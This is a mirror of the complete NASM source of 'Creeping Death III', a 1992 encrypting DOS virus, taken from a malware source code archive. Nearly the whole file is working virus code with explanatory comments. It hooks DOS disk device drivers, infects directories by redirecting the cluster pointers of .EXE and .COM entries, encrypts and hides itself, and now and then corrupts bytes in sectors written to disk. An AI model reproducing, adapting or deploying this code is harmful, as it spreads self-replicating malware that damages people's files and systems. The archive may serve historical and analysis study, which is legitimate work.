mirror of
https://github.com/vxunderground/MalwareSourceCode.git
synced 2025-01-19 08:38:52 +00:00
632 lines
21 KiB
NASM
632 lines
21 KiB
NASM
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Creeping Death III (Encrypting, try to find it) ;
|
|||
|
; ;
|
|||
|
; (c) Copyright 1992 by Bit Addict ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
code segment public 'code'
|
|||
|
assume cs:code, ds:code, es:code, ss:code
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Data ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
org 5ch ; use the space reserved for
|
|||
|
; the fcbs and command line
|
|||
|
; for more inportant data,
|
|||
|
; because we won't need this
|
|||
|
; data when the virus is
|
|||
|
; installed
|
|||
|
|
|||
|
EncryptWrite2: db 36 dup(?) ; Encrypt DoRequest Encrypt
|
|||
|
|
|||
|
BPB_Buf db 32 dup(?) ; buffer for BPB
|
|||
|
|
|||
|
Request equ this dword ; address of the request header
|
|||
|
RequestOffset dw ?
|
|||
|
RequestSegment dw ?
|
|||
|
|
|||
|
|
|||
|
org 100h ; com-file starts at offset 100
|
|||
|
; hex
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Actual start of virus. In this part the virus initializes the stack and ;
|
|||
|
; adjusts the device driver used by dos to read and write from floppy's and ;
|
|||
|
; hard disks. Then it will start the orginal exe or com-file ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
Encrypt: mov si,offset Main-1 ; this part of the program
|
|||
|
mov cx,400h-11 ; will decode the encoded
|
|||
|
Repeat: xor byte ptr [si],0 ; program, so it can be
|
|||
|
inc si ; executed
|
|||
|
loop Repeat
|
|||
|
|
|||
|
Main: mov sp,600h ; init stack
|
|||
|
inc word ptr Counter
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Get dosversion, if the virus is running with dos 4+ then si will be 0 else ;
|
|||
|
; si will be -1 ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
DosVersion: mov ah,30h ; fn 30h = Get Dosversion
|
|||
|
int 21h ; int 21h
|
|||
|
cmp al,4 ; major dosversion
|
|||
|
sbb di,di
|
|||
|
mov byte ptr drive[2],-1 ; set 2nd operand of cmp ah,??
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Adjust the size of the codesegment, with dos function 4ah ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
mov bx,60h ; Adjust size of memory block
|
|||
|
mov ah,4ah ; to 60 paragraphs = 600h bytes
|
|||
|
int 21h ; int 21h
|
|||
|
|
|||
|
mov ah,52h ; get internal list of lists
|
|||
|
int 21h ; int 21h
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; If the virus code segment is located behind the dos config memory block the ;
|
|||
|
; code segment will be part of the config memory block making it 61h ;
|
|||
|
; paragraphs larger. If the virus is not located next to the config memory ;
|
|||
|
; block the virus will set the owner to 8h (Dos system) ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
mov ax,es:[bx-2] ; segment of first MCB
|
|||
|
mov dx,cs ; dx = MCB of the code segment
|
|||
|
dec dx
|
|||
|
NextMCB: mov ds,ax ; ax = segment next MCB
|
|||
|
add ax,ds:[3]
|
|||
|
inc ax
|
|||
|
cmp ax,dx ; are they equal ?
|
|||
|
jne NextMCB ; no, not 1st program executed
|
|||
|
cmp word ptr ds:[1],8
|
|||
|
jne NoBoot
|
|||
|
add word ptr ds:[3],61h ; add 61h to size of block
|
|||
|
NoBoot: mov ds,dx ; ds = segment of MCB
|
|||
|
mov word ptr ds:[1],8 ; owner = dos system
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; The virus will search for the disk paramenter block for drive a: - c: in ;
|
|||
|
; order to find the device driver for these block devices. If any of these ;
|
|||
|
; blocks is found the virus will install its own device driver and set the ;
|
|||
|
; access flag to -1 to tell dos this device hasn't been accesed yet. ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
cld ; clear direction flag
|
|||
|
lds bx,es:[bx] ; get pointer to first drive
|
|||
|
; paramenter block
|
|||
|
|
|||
|
Search: cmp bx,-1 ; last block ?
|
|||
|
je Last
|
|||
|
mov ax,ds:[bx+di+15h] ; get segment of device header
|
|||
|
cmp ax,70h ; dos device header ??
|
|||
|
jne Next ; no, go to next device
|
|||
|
xchg ax,cx
|
|||
|
mov byte ptr ds:[bx+di+18h],-1 ; set access flag to "drive
|
|||
|
; has not been accessed"
|
|||
|
mov si,offset Header-4 ; set address of new device
|
|||
|
xchg si,ds:[bx+di+13h] ; and save old address
|
|||
|
mov ds:[bx+di+15h],cs
|
|||
|
Next: lds bx,ds:[bx+di+19h] ; next drive parameter block
|
|||
|
jmp Search
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; If the virus has failed in starting the orginal exe-file it will jump here. ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
Boot: mov ds,ds:[16h] ; es = parent PSP
|
|||
|
mov bx,ds:[16h] ; bx = parent PSP of Parent PSP
|
|||
|
xor si,si
|
|||
|
sub bx,1 ; filename+path available ?
|
|||
|
jnb Exec ; yes, execute it
|
|||
|
mov ax,cs ; get segment of MCB
|
|||
|
dec ax
|
|||
|
mov ds,ax
|
|||
|
mov cl,8 ; count length of filename
|
|||
|
mov si,8
|
|||
|
mov di,0ffh
|
|||
|
Count: lodsb
|
|||
|
or al,al
|
|||
|
loopne Count
|
|||
|
not cl
|
|||
|
and cl,7
|
|||
|
NextByte: mov si,8 ; search for this name in the
|
|||
|
inc di ; parent PSP to find the path
|
|||
|
push di ; to this file
|
|||
|
push cx
|
|||
|
rep cmpsb
|
|||
|
pop cx
|
|||
|
pop di
|
|||
|
jne NextByte
|
|||
|
BeginName: dec di ; name found, search for start
|
|||
|
cmp byte ptr es:[di-1],0 ; of name+path
|
|||
|
jne BeginName
|
|||
|
mov si,di
|
|||
|
mov bx,es
|
|||
|
jmp short Exec ; execute it
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; If none of these devices is found it means the virus is already resident ;
|
|||
|
; and the virus wasn't able to start the orginal exe-file (the file is ;
|
|||
|
; corrupted by copying it without the virus memory resident). If the device ;
|
|||
|
; is found the information in the header is copied. ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
Last: jcxz Exit
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; The information about the dos device driver is copyed to the virus code ;
|
|||
|
; segment ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
mov ds,cx ; ds = segment of Device Driver
|
|||
|
add si,4
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov di,offset Header ; prepare header of the viral
|
|||
|
movsw ; device driver and save the
|
|||
|
lodsw ; address of the dos strategy
|
|||
|
mov es:StrBlock,ax ; and interrupt procedures
|
|||
|
mov ax,offset Strategy
|
|||
|
stosw
|
|||
|
lodsw
|
|||
|
mov es:IntBlock,ax
|
|||
|
mov ax,offset Interrupt
|
|||
|
stosw
|
|||
|
movsb
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Deallocate the environment memory block and start the this file again, but ;
|
|||
|
; if the virus succeeds it will start the orginal exe-file. ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov bx,ds:[2ch] ; environment segment
|
|||
|
or bx,bx ; environment available ?
|
|||
|
jz Boot ; no, computer is rebooted
|
|||
|
mov es,bx
|
|||
|
mov ah,49h ; deallocate memory
|
|||
|
int 21h
|
|||
|
xor ax,ax ; end of environment is marked
|
|||
|
mov di,1 ; with two zero bytes
|
|||
|
Seek: dec di ; scan for end of environment
|
|||
|
scasw
|
|||
|
jne Seek
|
|||
|
lea si,ds:[di+2] ; es:si = start of filename
|
|||
|
Exec: push bx
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov bx,offset Param
|
|||
|
mov ds:[bx+4],cs ; set segments in EPB
|
|||
|
mov ds:[bx+8],cs
|
|||
|
mov ds:[bx+12],cs
|
|||
|
pop ds
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
|
|||
|
mov di,offset Filename ; copy name of this file
|
|||
|
push di
|
|||
|
mov cx,40
|
|||
|
rep movsw
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
|
|||
|
mov ah,3dh ; open file, this file will
|
|||
|
mov dx,offset File ; not be found but the entire
|
|||
|
int 21h ; directory is searched and
|
|||
|
pop dx ; infected
|
|||
|
|
|||
|
mov ax,4b00h ; execute file
|
|||
|
int 21h
|
|||
|
Exit: mov ah,4dh ; get exit-code
|
|||
|
int 21h
|
|||
|
mov ah,4ch ; terminate (al = exit code)
|
|||
|
int 21h
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Installation complete ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; The next part contains the device driver used by creeping death to infect ;
|
|||
|
; directory's ;
|
|||
|
; ;
|
|||
|
; The device driver uses only the strategy routine to handle the requests. ;
|
|||
|
; I don't know if this is because the virus will work better or the writer ;
|
|||
|
; of this virus didn't know how to do it right. ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
|
|||
|
Strategy: mov cs:RequestOffset,bx ; store segment and offset of
|
|||
|
mov cs:RequestSegment,es ; request block
|
|||
|
retf ; return to dos (or whatever
|
|||
|
; called this device driver)
|
|||
|
|
|||
|
Interrupt: push ax ; driver strategy block
|
|||
|
push bx ; save registers
|
|||
|
push cx
|
|||
|
push dx
|
|||
|
push si
|
|||
|
push di
|
|||
|
push ds
|
|||
|
push es
|
|||
|
|
|||
|
les bx,cs:Request ; es:bx = request block
|
|||
|
push es ; ds:bx = request block
|
|||
|
pop ds
|
|||
|
mov al,ds:[bx+2] ; command code
|
|||
|
|
|||
|
cmp al,4 ; read sector from disk
|
|||
|
je Input
|
|||
|
cmp al,8 ; write sector to disk
|
|||
|
je Output
|
|||
|
cmp al,9
|
|||
|
je Output
|
|||
|
|
|||
|
call DoRequest ; let dos do handle the request
|
|||
|
|
|||
|
cmp al,2 ; Build BPB
|
|||
|
jne Return
|
|||
|
lds si,ds:[bx+12h] ; copy the BPB and change it
|
|||
|
mov di,offset bpb_buf ; into one that hides the virus
|
|||
|
mov es:[bx+12h],di
|
|||
|
mov es:[bx+14h],cs
|
|||
|
push es ; copy
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
mov cx,16
|
|||
|
rep movsw
|
|||
|
pop es
|
|||
|
push cs
|
|||
|
pop ds
|
|||
|
mov al,ds:[di+2-32] ; change
|
|||
|
cmp al,2
|
|||
|
adc al,0
|
|||
|
cbw
|
|||
|
cmp word ptr ds:[di+8-32],0 ; >32mb partition ?
|
|||
|
je m32 ; yes, jump to m32
|
|||
|
sub ds:[di+8-32],ax ; <32mb partition
|
|||
|
jmp short Return
|
|||
|
m32: sub ds:[di+15h-32],ax ; >32mb partition
|
|||
|
sbb word ptr ds:[di+17h-32],0
|
|||
|
Return: pop es ; return to caller
|
|||
|
pop ds
|
|||
|
pop di
|
|||
|
pop si
|
|||
|
pop dx
|
|||
|
pop cx
|
|||
|
pop bx
|
|||
|
pop ax
|
|||
|
retf
|
|||
|
|
|||
|
Output: inc byte ptr cs:Random ; increase counter
|
|||
|
jnz Skip ; zero ?
|
|||
|
push bx ; yes, change one byte in the
|
|||
|
push ds ; sector to write
|
|||
|
lds bx,ds:[bx+16h]
|
|||
|
inc bh
|
|||
|
inc byte ptr ds:[bx] ; destroy some data
|
|||
|
pop ds
|
|||
|
pop bx
|
|||
|
Skip: mov cx,0ff09h
|
|||
|
call Check ; check if disk changed
|
|||
|
jz Disk ; yes, write virus to disk
|
|||
|
jmp InfectSector ; no, just infect sector
|
|||
|
Disk: call DoRequest
|
|||
|
jmp short InfectDisk
|
|||
|
|
|||
|
ReadError: add sp,16 ; error during request
|
|||
|
jmp short Return
|
|||
|
|
|||
|
Input: call check ; check if disk changed
|
|||
|
jnz InfectDisk ; no, read sector
|
|||
|
jmp Read
|
|||
|
InfectDisk: mov byte ptr ds:[bx+2],4 ; yes, write virus to disk
|
|||
|
cld ; save last part of request
|
|||
|
lea si,ds:[bx+0eh]
|
|||
|
mov cx,8
|
|||
|
Save: lodsw
|
|||
|
push ax
|
|||
|
loop Save
|
|||
|
mov word ptr ds:[bx+14h],1 ; read 1st sector on disk
|
|||
|
call ReadSector
|
|||
|
jnz ReadError
|
|||
|
mov byte ptr ds:[bx+2],2 ; build BPB
|
|||
|
call DoRequest
|
|||
|
lds si,ds:[bx+12h] ; ds:si = BPB
|
|||
|
mov di,ds:[si+6] ; size of root directory
|
|||
|
add di,15 ; in sectors
|
|||
|
mov cl,4
|
|||
|
shr di,cl
|
|||
|
mov al,ds:[si+5]
|
|||
|
cbw
|
|||
|
mov dx,ds:[si+0bh]
|
|||
|
mul dx ; ax=fat sectors, dx=0
|
|||
|
add ax,ds:[si+3]
|
|||
|
add di,ax
|
|||
|
push di ; save it on stack
|
|||
|
mov ax,ds:[si+8] ; total number of sectors
|
|||
|
cmp ax,dx ; >32mb
|
|||
|
jnz More ; no, skip next 2 instructions
|
|||
|
mov ax,ds:[si+15h] ; get number of sectors
|
|||
|
mov dx,ds:[si+17h]
|
|||
|
More: xor cx,cx ; cx=0
|
|||
|
sub ax,di ; dx:ax=number is data sectors
|
|||
|
sbb dx,cx
|
|||
|
mov cl,ds:[si+2] ; cx=sectors / cluster
|
|||
|
div cx ; number of clusters on disk
|
|||
|
cmp cl,2 ; 1 sector/cluster ?
|
|||
|
sbb ax,-1 ; number of clusters (+1 or +2)
|
|||
|
push ax ; save it on stack
|
|||
|
call Convert ; get fat sector and offset in
|
|||
|
mov byte ptr es:[bx+2],4 ; sector
|
|||
|
mov es:[bx+14h],ax
|
|||
|
call ReadSector ; read fat sector
|
|||
|
lds si,es:[bx+0eh]
|
|||
|
add si,dx
|
|||
|
sub dh,cl ; has something to do with the
|
|||
|
adc dx,ax ; encryption of the pointers
|
|||
|
mov word ptr cs:[gad+1],dx
|
|||
|
cmp cl,1 ; 1 sector / cluster
|
|||
|
jne Ok
|
|||
|
not di ; this is used when the
|
|||
|
and ds:[si],di ; clusters are 1 sector long
|
|||
|
pop ax ; allocate 1st cluster
|
|||
|
push ax
|
|||
|
inc ax
|
|||
|
push ax
|
|||
|
mov dx,0fh
|
|||
|
test di,dx
|
|||
|
jz Here
|
|||
|
inc dx
|
|||
|
mul dx
|
|||
|
Here: or ds:[si],ax
|
|||
|
pop ax
|
|||
|
call Convert
|
|||
|
mov si,es:[bx+0eh]
|
|||
|
add si,dx
|
|||
|
Ok: mov ax,ds:[si] ; allocate last cluster
|
|||
|
and ax,di
|
|||
|
mov dx,di
|
|||
|
dec dx
|
|||
|
and dx,di
|
|||
|
not di
|
|||
|
and ds:[si],di
|
|||
|
or ds:[si],dx
|
|||
|
cmp ax,dx ; cluster already allocated by
|
|||
|
pop ax ; the virus ?
|
|||
|
pop di
|
|||
|
mov word ptr cs:[pointer+1],ax
|
|||
|
je DiskInfected ; yes, don't write it and go on
|
|||
|
mov dx,ds:[si]
|
|||
|
mov byte ptr es:[bx+2],8 ; write the adjusted sector to
|
|||
|
call DoRequest ; disk
|
|||
|
jnz DiskInfected
|
|||
|
mov byte ptr es:[bx+2],4 ; read it again
|
|||
|
call ReadSector
|
|||
|
cmp ds:[si],dx ; is it written correctly ?
|
|||
|
jne DiskInfected ; no, can't infect disk
|
|||
|
dec ax
|
|||
|
dec ax ; calculate the sector number
|
|||
|
mul cx ; to write the virus to
|
|||
|
add ax,di
|
|||
|
adc dx,0
|
|||
|
push es
|
|||
|
pop ds
|
|||
|
mov word ptr ds:[bx+12h],2
|
|||
|
mov ds:[bx+14h],ax ; store it in the request hdr
|
|||
|
test dx,dx
|
|||
|
jz Less
|
|||
|
mov word ptr ds:[bx+14h],-1
|
|||
|
mov ds:[bx+1ah],ax
|
|||
|
mov ds:[bx+1ch],dx
|
|||
|
Less: mov ds:[bx+10h],cs
|
|||
|
mov ds:[bx+0eh],100h
|
|||
|
mov byte ptr es:[bx+2],8 ; write it
|
|||
|
call EncryptWrite1
|
|||
|
|
|||
|
DiskInfected: mov byte ptr ds:[bx+2],4 ; restore this byte
|
|||
|
std ; restore other part of the
|
|||
|
lea di,ds:[bx+1ch] ; request
|
|||
|
mov cx,8
|
|||
|
Load: pop ax
|
|||
|
stosw
|
|||
|
loop Load
|
|||
|
Read: call DoRequest ; do request
|
|||
|
|
|||
|
mov cx,9
|
|||
|
InfectSector: mov di,es:[bx+12h] ; get number of sectors read
|
|||
|
lds si,es:[bx+0eh] ; get address of data
|
|||
|
sal di,cl ; calculate end of buffer
|
|||
|
xor cl,cl
|
|||
|
add di,si
|
|||
|
xor dl,dl
|
|||
|
push ds ; infect the sector
|
|||
|
push si
|
|||
|
call find
|
|||
|
jcxz no_inf ; write sector ?
|
|||
|
mov al,8
|
|||
|
xchg al,es:[bx+2] ; save command byte
|
|||
|
call DoRequest ; write sector
|
|||
|
mov es:[bx+2],al ; restore command byte
|
|||
|
and byte ptr es:[bx+4],07fh
|
|||
|
no_inf: pop si
|
|||
|
pop ds
|
|||
|
inc dx ; disinfect sector in memory
|
|||
|
call find
|
|||
|
jmp Return ; return to caller
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Subroutines ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
Find: mov ax,ds:[si+8] ; (dis)infect sector in memory
|
|||
|
cmp ax,"XE" ; check for .exe
|
|||
|
jne com
|
|||
|
cmp ds:[si+10],al
|
|||
|
je found
|
|||
|
Com: cmp ax,"OC" ; check for .com
|
|||
|
jne go_on
|
|||
|
cmp byte ptr ds:[si+10],"M"
|
|||
|
jne go_on
|
|||
|
Found: test word ptr ds:[si+1eh],0ffc0h ; file to big
|
|||
|
jnz go_on ; more than 4mb
|
|||
|
test word ptr ds:[si+1dh],03ff8h ; file to small
|
|||
|
jz go_on ; less than 2048 bytes
|
|||
|
test byte ptr ds:[si+0bh],1ch ; directory, system or
|
|||
|
jnz go_on ; volume label
|
|||
|
test dl,dl ; infect or disinfect ?
|
|||
|
jnz rest
|
|||
|
Pointer: mov ax,1234h ; ax = viral cluster
|
|||
|
cmp ax,ds:[si+1ah] ; file already infected ?
|
|||
|
je go_on ; yes, go on
|
|||
|
xchg ax,ds:[si+1ah] ; exchange pointers
|
|||
|
Gad: xor ax,1234h ; encryption
|
|||
|
mov ds:[si+14h],ax ; store it on another place
|
|||
|
loop go_on ; change cx and go on
|
|||
|
Rest: xor ax,ax ; ax = 0
|
|||
|
xchg ax,ds:[si+14h] ; get pointer
|
|||
|
xor ax,word ptr cs:[gad+1] ; Encrypt
|
|||
|
mov ds:[si+1ah],ax ; store it on the right place
|
|||
|
Go_on: rol word ptr cs:[gad+1],1 ; change encryption
|
|||
|
add si,32 ; next directory entry
|
|||
|
cmp di,si ; end of buffer ?
|
|||
|
jne find ; no, do it again
|
|||
|
ret ; return
|
|||
|
|
|||
|
Check: mov ah,ds:[bx+1] ; get number of unit
|
|||
|
Drive: cmp ah,-1 ; same as last call ?
|
|||
|
mov byte ptr cs:[drive+2],ah ; set 2nd parameter
|
|||
|
jne Changed
|
|||
|
push ds:[bx+0eh] ; save word
|
|||
|
mov byte ptr ds:[bx+2],1 ; disk changed ?
|
|||
|
call DoRequest
|
|||
|
cmp byte ptr ds:[bx+0eh],1 ; 1=Yes
|
|||
|
pop ds:[bx+0eh] ; restore word
|
|||
|
mov ds:[bx+2],al ; restore command
|
|||
|
Changed: ret ; return
|
|||
|
|
|||
|
ReadSector: mov word ptr es:[bx+12h],1 ; read sector from disk
|
|||
|
|
|||
|
DoRequest: db 09ah ; call 70:?, orginal strategy
|
|||
|
StrBlock dw ?,70h
|
|||
|
db 09ah ; call 70:?, orginal interrupt
|
|||
|
IntBlock dw ?,70h
|
|||
|
test byte ptr es:[bx+4],80h ; error ? yes, zf = 0
|
|||
|
ret ; return
|
|||
|
|
|||
|
Convert: cmp ax,0ff0h ; convert cluster number into
|
|||
|
jae Fat16 ; an sector number and offset
|
|||
|
mov si,3 ; into this sector containing
|
|||
|
xor word ptr cs:[si+gad-1],si ; the fat-item of this
|
|||
|
mul si ; cluster
|
|||
|
shr ax,1
|
|||
|
mov di,0fffh
|
|||
|
jnc Continue
|
|||
|
mov di,0fff0h
|
|||
|
jmp short Continue
|
|||
|
Fat16: mov si,2
|
|||
|
mul si
|
|||
|
mov di,0ffffh
|
|||
|
Continue: mov si,512
|
|||
|
div si
|
|||
|
inc ax
|
|||
|
ret
|
|||
|
|
|||
|
EncryptWrite1: push ds ; write virus to disk
|
|||
|
push cs ; (encrypted) save regs
|
|||
|
pop ds
|
|||
|
push es
|
|||
|
push cs
|
|||
|
pop es
|
|||
|
cld ; copy forward
|
|||
|
mov cx,12 ; length of encryptor
|
|||
|
mov si,offset Encrypt ; start of encryptor
|
|||
|
mov di,offset EncryptWrite2 ; destenation
|
|||
|
inc byte ptr ds:[si+8] ; change xor value
|
|||
|
rep movsb ; copy encryptor
|
|||
|
mov cl,10 ; copy dorequest proc
|
|||
|
mov si,offset DoRequest
|
|||
|
rep movsb
|
|||
|
mov cl,12 ; copy encryptor
|
|||
|
mov si,offset Encrypt
|
|||
|
rep movsb
|
|||
|
mov ax,0c31fh ; store "pop ds","ret"
|
|||
|
stosw ; instructions
|
|||
|
pop es ; restore register
|
|||
|
jmp EncryptWrite2 ; encrypt and write vir
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; Data ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
File db "C:",255,0 ; the virus tries to open this
|
|||
|
; file
|
|||
|
|
|||
|
Counter dw 0 ; this will count the number of
|
|||
|
; systems that are infected by
|
|||
|
; this virus
|
|||
|
|
|||
|
Param dw 0,80h,?,5ch,?,6ch,? ; parameters for the
|
|||
|
; exec-function
|
|||
|
|
|||
|
Random db ? ; if this byte becomes zero
|
|||
|
; the virus will change the
|
|||
|
; sector that will be written
|
|||
|
; to disk
|
|||
|
|
|||
|
Header db 7 dup(?) ; this is the header for the
|
|||
|
; device driver
|
|||
|
|
|||
|
Filename db ? ; Buffer for the filename used
|
|||
|
; by the exec-function
|
|||
|
|
|||
|
|
|||
|
;*****************************************************************************;
|
|||
|
; ;
|
|||
|
; The End ;
|
|||
|
; ;
|
|||
|
;*****************************************************************************;
|
|||
|
|
|||
|
code ends ; end of the viral code
|
|||
|
|
|||
|
end Encrypt ; start at offset 100h for
|
|||
|
; com-file
|
|||
|
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> and Remember Don't Forget to Call <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>> ARRESTED DEVELOPMENT +31.79.426o79 H/P/A/V/AV/? <<3C><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|
|||
|
; <20><><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD><EFBFBD>
|